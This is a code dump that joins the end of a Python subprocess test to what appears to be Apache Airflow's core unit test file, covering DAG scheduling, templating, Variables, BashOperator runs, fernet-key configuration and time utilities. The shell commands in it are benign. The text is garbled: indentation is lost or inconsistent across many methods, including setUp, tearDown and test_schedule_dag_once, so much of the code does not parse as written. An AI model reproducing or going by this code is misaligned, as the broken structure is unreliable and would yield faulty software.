                                  stderr=subprocess.PIPE) as proc:
                pass

    def test_broken_pipe_cleanup(self):
        """Broken pipe error should not prevent wait() (Issue 21619)"""
        proc = subprocess.Popen([sys.executable, '-c', 'pass'],
                                stdin=subprocess.PIPE,
                                bufsize=support.PIPE_MAX_SIZE*2)
        proc = proc.__enter__()
        # Prepare to send enough data to overflow any OS pipe buffering and
        # guarantee a broken pipe error. Data is held in BufferedWriter
        # buffer until closed.
        proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
        self.assertIsNone(proc.returncode)
        # EPIPE expected under POSIX; EINVAL under Windows
        self.assertRaises(OSError, proc.__exit__, None, None, None)
        self.assertEqual(proc.returncode, 0)
        self.assertTrue(proc.stdin.closed)
# Run the test suite when this module is executed directly.
if __name__ == "__main__":
    unittest.main()
|
core.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import json
import multiprocessing
import os
import pickle # type: ignore
import re
import signal
import subprocess
import tempfile
import unittest
from datetime import timedelta
from tempfile import NamedTemporaryFile
from time import sleep
from unittest import mock
import sqlalchemy
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from pendulum import utcnow
from airflow import DAG, configuration, exceptions, jobs, settings, utils
from airflow.bin import cli
from airflow.configuration import AirflowConfigException, conf, run_command
from airflow.exceptions import AirflowException
from airflow.executors import SequentialExecutor
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.models import BaseOperator, Connection, DagBag, DagRun, Pool, TaskFail, TaskInstance, Variable
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from airflow.version import version
from tests.test_utils.config import conf_vars
# Sentinel dag_folder: pointing DagBag at /dev/null means only the bundled
# example DAGs get loaded.
DEV_NULL = '/dev/null'
# Directory holding the test DAG definitions, next to this file.
TEST_DAG_FOLDER = os.path.join(
    os.path.dirname(os.path.realpath(__file__)), 'dags')
# `datetime` here is airflow.utils.timezone.datetime (see imports above),
# so these dates are timezone-aware.
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]  # just the YYYY-MM-DD part
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
class OperatorSubclass(BaseOperator):
    """
    An operator to test template substitution
    """
    # Fields listed here are rendered by Airflow's templating engine
    # before execute() runs.
    template_fields = ['some_templated_field']

    def __init__(self, some_templated_field, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.some_templated_field = some_templated_field

    def execute(self, context):
        # Intentionally a no-op: only templating behavior is under test.
        pass
class TestCore(unittest.TestCase):
    # One distinct DAG id per scheduling scenario so tearDown can delete
    # exactly the DB rows each test created.
    TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_no_previous_runs'
    TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID = \
        TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous'
    TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID = \
        TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only'
    TEST_SCHEDULE_ONCE_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_once'
    TEST_SCHEDULE_RELATIVEDELTA_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_relativedelta'
    TEST_SCHEDULE_START_END_DATES_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_start_end_dates'

    # Each SchedulerJob created in these tests performs a single run.
    default_scheduler_args = {"num_runs": 1}
def setUp(self):
    # dag_folder=/dev/null loads no project DAGs; include_examples pulls in
    # the bundled example DAGs used below.
    self.dagbag = DagBag(
        dag_folder=DEV_NULL, include_examples=True)
    self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
    self.dag = DAG(TEST_DAG_ID, default_args=self.args)
    # Convenience handles into the example_bash_operator DAG.
    self.dag_bash = self.dagbag.dags['example_bash_operator']
    self.runme_0 = self.dag_bash.get_task('runme_0')
    self.run_after_loop = self.dag_bash.get_task('run_after_loop')
    self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
    # NOTE(review): cleanup is skipped when running under the
    # Kubernetes CI — presumably that environment resets the database
    # itself; confirm before relying on it.
    if os.environ.get('KUBERNETES_VERSION') is not None:
        return
    # Purge every DagRun/TaskInstance/TaskFail row these tests created,
    # keyed by the per-test DAG ids declared on the class.
    dag_ids_to_clean = [
        TEST_DAG_ID,
        self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID,
        self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
        self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
        self.TEST_SCHEDULE_ONCE_DAG_ID,
        self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
        self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
    ]
    session = Session()
    # synchronize_session=False: bulk delete, no in-session bookkeeping.
    session.query(DagRun).filter(
        DagRun.dag_id.in_(dag_ids_to_clean)).delete(
        synchronize_session=False)
    session.query(TaskInstance).filter(
        TaskInstance.dag_id.in_(dag_ids_to_clean)).delete(
        synchronize_session=False)
    session.query(TaskFail).filter(
        TaskFail.dag_id.in_(dag_ids_to_clean)).delete(
        synchronize_session=False)
    session.commit()
    session.close()
def test_schedule_dag_no_previous_runs(self):
    """
    Tests scheduling a dag with no previous runs
    """
    dag = DAG(self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID)
    dag.add_task(BaseOperator(
        task_id="faketastic",
        owner='Also fake',
        start_date=datetime(2015, 1, 2, 0, 0)))

    dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
    self.assertIsNotNone(dag_run)
    self.assertEqual(dag.dag_id, dag_run.dag_id)
    self.assertIsNotNone(dag_run.run_id)
    self.assertNotEqual('', dag_run.run_id)
    # First run must be scheduled at the task's start_date.
    self.assertEqual(
        datetime(2015, 1, 2, 0, 0),
        dag_run.execution_date,
        msg='dag_run.execution_date did not match expectation: {0}'
        .format(dag_run.execution_date)
    )
    self.assertEqual(State.RUNNING, dag_run.state)
    self.assertFalse(dag_run.external_trigger)
    dag.clear()
    def test_schedule_dag_relativedelta(self):
        """
        Tests scheduling a dag with a relativedelta schedule_interval
        """
        delta = relativedelta(hours=+1)
        dag = DAG(self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
                  schedule_interval=delta)
        dag.add_task(BaseOperator(
            task_id="faketastic",
            owner='Also fake',
            start_date=datetime(2015, 1, 2, 0, 0)))
        # First run lands on the task's start_date.
        dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
        self.assertIsNotNone(dag_run)
        self.assertEqual(dag.dag_id, dag_run.dag_id)
        self.assertIsNotNone(dag_run.run_id)
        self.assertNotEqual('', dag_run.run_id)
        self.assertEqual(
            datetime(2015, 1, 2, 0, 0),
            dag_run.execution_date,
            msg='dag_run.execution_date did not match expectation: {0}'
                .format(dag_run.execution_date)
        )
        self.assertEqual(State.RUNNING, dag_run.state)
        self.assertFalse(dag_run.external_trigger)
        # Second run must be exactly one relativedelta interval later,
        # proving relativedelta arithmetic is applied to execution_date.
        dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
        self.assertIsNotNone(dag_run2)
        self.assertEqual(dag.dag_id, dag_run2.dag_id)
        self.assertIsNotNone(dag_run2.run_id)
        self.assertNotEqual('', dag_run2.run_id)
        self.assertEqual(
            datetime(2015, 1, 2, 0, 0) + delta,
            dag_run2.execution_date,
            msg='dag_run2.execution_date did not match expectation: {0}'
                .format(dag_run2.execution_date)
        )
        self.assertEqual(State.RUNNING, dag_run2.state)
        self.assertFalse(dag_run2.external_trigger)
        dag.clear()
    def test_schedule_dag_fake_scheduled_previous(self):
        """
        Test scheduling a dag where there is a prior DagRun
        which has the same run_id as the next run should have
        """
        delta = timedelta(hours=1)
        dag = DAG(self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
                  schedule_interval=delta,
                  start_date=DEFAULT_DATE)
        dag.add_task(BaseOperator(
            task_id="faketastic",
            owner='Also fake',
            start_date=DEFAULT_DATE))
        scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
        # Fake an externally-triggered run that occupies the run_id the
        # scheduler would normally use for DEFAULT_DATE.
        dag.create_dagrun(run_id=DagRun.id_for_date(DEFAULT_DATE),
                          execution_date=DEFAULT_DATE,
                          state=State.SUCCESS,
                          external_trigger=True)
        dag_run = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dag_run)
        self.assertEqual(dag.dag_id, dag_run.dag_id)
        self.assertIsNotNone(dag_run.run_id)
        self.assertNotEqual('', dag_run.run_id)
        # The scheduler must skip past the occupied slot to the next
        # interval rather than colliding with the existing run_id.
        self.assertEqual(
            DEFAULT_DATE + delta,
            dag_run.execution_date,
            msg='dag_run.execution_date did not match expectation: {0}'
                .format(dag_run.execution_date)
        )
        self.assertEqual(State.RUNNING, dag_run.state)
        self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(self.TEST_SCHEDULE_ONCE_DAG_ID)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
    def test_fractional_seconds(self):
        """
        Tests if fractional seconds are stored in the database
        """
        dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
        dag.schedule_interval = '@once'
        dag.add_task(BaseOperator(
            task_id="faketastic",
            owner='Also fake',
            start_date=datetime(2015, 1, 2, 0, 0)))
        # utcnow() carries microseconds; both dates below must survive the
        # DB round-trip without truncation.
        start_date = timezone.utcnow()
        run = dag.create_dagrun(
            run_id='test_' + start_date.isoformat(),
            execution_date=start_date,
            start_date=start_date,
            state=State.RUNNING,
            external_trigger=False
        )
        # Re-read from the DB so we compare the persisted values.
        run.refresh_from_db()
        self.assertEqual(start_date, run.execution_date,
                         "dag run execution_date loses precision")
        self.assertEqual(start_date, run.start_date,
                         "dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
    def test_schedule_dag_no_end_date_up_to_today_only(self):
        """
        Tests that a Dag created without an end_date can only be scheduled up
        to and including the current datetime.

        For example, if today is 2016-01-01 and we are scheduling from a
        start_date of 2015-01-01, only jobs up to, but not including
        2016-01-01 should be scheduled.
        """
        session = settings.Session()
        delta = timedelta(days=1)
        now = utcnow()
        start_date = now.subtract(weeks=1)
        # One daily run for each day between start_date and now.
        runs = (now - start_date).days
        dag = DAG(self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
                  start_date=start_date,
                  schedule_interval=delta)
        dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
        dag_runs = []
        scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
        for _ in range(runs):
            dag_run = scheduler.create_dag_run(dag)
            dag_runs.append(dag_run)
            # Mark the DagRun as complete so the scheduler will move on to
            # the next interval instead of waiting on this one.
            dag_run.state = State.SUCCESS
            session.merge(dag_run)
            session.commit()
        # Attempt to schedule an additional dag run (for 2016-01-01)
        additional_dag_run = scheduler.create_dag_run(dag)
        for dag_run in dag_runs:
            self.assertIsNotNone(dag_run)
        # The run that would land on "today" must not be created.
        self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
    def test_rich_comparison_ops(self):
        """DAG equality, ordering and hashing follow _comps and dag_id."""
        class DAGsubclass(DAG):
            pass

        dag_eq = DAG(TEST_DAG_ID, default_args=self.args)

        dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
        dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)

        dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
        dag_subclass_diff_name = DAGsubclass(
            TEST_DAG_ID + '2', default_args=self.args)

        # Align load times so only dag_diff_load_time differs in that field.
        for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
            d.last_loaded = self.dag.last_loaded

        # test identity equality
        self.assertEqual(self.dag, self.dag)

        # test dag (in)equality based on _comps
        self.assertEqual(dag_eq, self.dag)
        self.assertNotEqual(dag_diff_name, self.dag)
        self.assertNotEqual(dag_diff_load_time, self.dag)

        # test dag inequality based on type even if _comps happen to match
        self.assertNotEqual(dag_subclass, self.dag)

        # a dag should equal an unpickled version of itself
        d = pickle.dumps(self.dag)
        self.assertEqual(pickle.loads(d), self.dag)

        # dags are ordered based on dag_id no matter what the type is
        self.assertLess(self.dag, dag_diff_name)
        self.assertGreater(self.dag, dag_diff_load_time)
        self.assertLess(self.dag, dag_subclass_diff_name)

        # greater than should have been created automatically by functools
        self.assertGreater(dag_diff_name, self.dag)

        # hashes are non-random and match equality
        self.assertEqual(hash(self.dag), hash(self.dag))
        self.assertEqual(hash(dag_eq), hash(self.dag))
        self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
        self.assertNotEqual(hash(dag_subclass), hash(self.dag))
    def test_check_operators(self):
        """CheckOperator and ValueCheckOperator run against sqlite_default."""
        conn_id = "sqlite_default"

        captainHook = BaseHook.get_hook(conn_id=conn_id)
        # Seed a throwaway table so the COUNT(*) check has a row to find.
        captainHook.run("CREATE TABLE operator_test_table (a, b)")
        captainHook.run("insert into operator_test_table values (1,2)")

        t = CheckOperator(
            task_id='check',
            sql="select count(*) from operator_test_table",
            conn_id=conn_id,
            dag=self.dag)
        t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

        # 100 is within 10% tolerance of pass_value 95, so this passes.
        t = ValueCheckOperator(
            task_id='value_check',
            pass_value=95,
            tolerance=0.1,
            conn_id=conn_id,
            sql="SELECT 100",
            dag=self.dag)
        t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

        captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
msg = 'Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'
with conf_vars({('operators', 'allow_illegal_arguments'): 'True'}):
with self.assertWarns(PendingDeprecationWarning) as warning:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
assert any(msg in str(w) for w in warning.warnings)
    def test_illegal_args_forbidden(self):
        """
        Tests that operators raise exceptions on illegal arguments when
        illegal arguments are not allowed.
        """
        with self.assertRaises(AirflowException) as ctx:
            BashOperator(
                task_id='test_illegal_args',
                bash_command='echo success',
                dag=self.dag,
                illegal_argument_1234='hello?')
        # The two adjacent literals below are intentionally parenthesized so
        # they concatenate into one message string.
        self.assertIn(
            ('Invalid arguments were passed to BashOperator '
             '(task_id: test_illegal_args).'),
            str(ctx.exception))
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
    def test_on_failure_callback(self):
        """on_failure_callback fires and receives the raised exception."""
        # Annoying workaround for nonlocal not existing in python 2
        data = {'called': False}

        def check_failure(context, test_case=self):
            # Record the call and verify the exception reached the context.
            data['called'] = True
            error = context.get('exception')
            test_case.assertIsInstance(error, AirflowException)

        t = BashOperator(
            task_id='check_on_failure_callback',
            bash_command="exit 1",
            dag=self.dag,
            on_failure_callback=check_failure)

        self.assertRaises(
            exceptions.AirflowException,
            t.run,
            start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        self.assertTrue(data['called'])
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
    def test_complex_template(self):
        """Templating recurses into nested containers (dicts and lists)."""
        def verify_templated_field(context):
            # The "{{ ds }}" buried inside the list must be rendered.
            self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
                             context['ds'])

        t = OperatorSubclass(
            task_id='test_complex_template',
            some_templated_field={
                'foo': '123',
                'bar': ['baz', '{{ ds }}']
            },
            dag=self.dag)
        # Replace execute so the assertion runs inside the task itself.
        t.execute = verify_templated_field
        t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
    def test_template_with_variable(self):
        """
        Test the availability of variables in templates
        """
        val = {
            'test_value': 'a test value'
        }
        Variable.set("a_variable", val['test_value'])

        def verify_templated_field(context):
            self.assertEqual(context['ti'].task.some_templated_field,
                             val['test_value'])

        t = OperatorSubclass(
            task_id='test_complex_template',
            some_templated_field='{{ var.value.a_variable }}',
            dag=self.dag)
        # Replace execute so the assertion runs inside the task itself.
        t.execute = verify_templated_field
        t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
    def test_template_with_json_variable(self):
        """
        Test the availability of variables (serialized as JSON) in templates
        """
        val = {
            'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
        }
        Variable.set("a_variable", val['test_value'], serialize_json=True)

        def verify_templated_field(context):
            # var.json deserializes the variable, so nested attribute access
            # ("obj.v2") works inside the template.
            self.assertEqual(context['ti'].task.some_templated_field,
                             val['test_value']['obj']['v2'])

        t = OperatorSubclass(
            task_id='test_complex_template',
            some_templated_field='{{ var.json.a_variable.obj.v2 }}',
            dag=self.dag)
        t.execute = verify_templated_field
        t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
    def test_template_with_json_variable_as_value(self):
        """
        Test the availability of variables (serialized as JSON) in templates, but
        accessed as a value
        """
        val = {
            'test_value': {'foo': 'bar'}
        }
        Variable.set("a_variable", val['test_value'], serialize_json=True)

        def verify_templated_field(context):
            # var.value returns the raw stored string, i.e. the JSON text,
            # not the deserialized dict.
            self.assertEqual(context['ti'].task.some_templated_field,
                             '{\n  "foo": "bar"\n}')

        t = OperatorSubclass(
            task_id='test_complex_template',
            some_templated_field='{{ var.value.a_variable }}',
            dag=self.dag)
        t.execute = verify_templated_field
        t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
    def test_task_get_template(self):
        """The template context exposes the expected date strings for a
        daily DAG run on DEFAULT_DATE."""
        TI = TaskInstance
        ti = TI(
            task=self.runme_0, execution_date=DEFAULT_DATE)
        ti.dag = self.dag_bash
        ti.run(ignore_ti_state=True)
        context = ti.get_template_context()

        # DEFAULT DATE is 2015-01-01
        self.assertEqual(context['ds'], '2015-01-01')
        self.assertEqual(context['ds_nodash'], '20150101')

        # next_ds is 2015-01-02 as the dag interval is daily
        self.assertEqual(context['next_ds'], '2015-01-02')
        self.assertEqual(context['next_ds_nodash'], '20150102')

        # prev_ds is 2014-12-31 as the dag interval is daily
        self.assertEqual(context['prev_ds'], '2014-12-31')
        self.assertEqual(context['prev_ds_nodash'], '20141231')

        self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
        self.assertEqual(context['ts_nodash'], '20150101T000000')
        self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')

        self.assertEqual(context['yesterday_ds'], '2014-12-31')
        self.assertEqual(context['yesterday_ds_nodash'], '20141231')

        self.assertEqual(context['tomorrow_ds'], '2015-01-02')
        self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
    def test_variable_delete(self):
        """Variable.delete removes the value; deleting a missing key is a
        no-op."""
        key = "tested_var_delete"
        value = "to be deleted"

        # No-op if the variable doesn't exist
        Variable.delete(key)
        with self.assertRaises(KeyError):
            Variable.get(key)

        # Set the variable
        Variable.set(key, value)
        self.assertEqual(value, Variable.get(key))

        # Delete the variable
        Variable.delete(key)
        with self.assertRaises(KeyError):
            Variable.get(key)
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
    def test_config_use_original_when_original_and_fallback_are_present(self):
        """When both FERNET_KEY and FERNET_KEY_CMD are set, the direct
        option wins over the _CMD fallback."""
        self.assertTrue(conf.has_option("core", "FERNET_KEY"))
        self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))

        FERNET_KEY = conf.get('core', 'FERNET_KEY')

        # Add a _CMD fallback; the original value must still be returned.
        with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
            FALLBACK_FERNET_KEY = conf.get(
                "core",
                "FERNET_KEY"
            )

        self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
    def test_config_throw_error_when_original_and_fallback_is_absent(self):
        """With neither FERNET_KEY nor FERNET_KEY_CMD set, conf.get raises
        a descriptive AirflowConfigException."""
        self.assertTrue(conf.has_option("core", "FERNET_KEY"))
        self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))

        # Unset the option entirely; the lookup must now fail loudly.
        with conf_vars({('core', 'fernet_key'): None}):
            with self.assertRaises(AirflowConfigException) as cm:
                conf.get("core", "FERNET_KEY")

        exception = str(cm.exception)
        message = "section/key [core/fernet_key] not found in config"
        self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
with unittest.mock.patch.dict('os.environ', {key: value}):
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
with unittest.mock.patch.dict('os.environ', {key: value}):
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
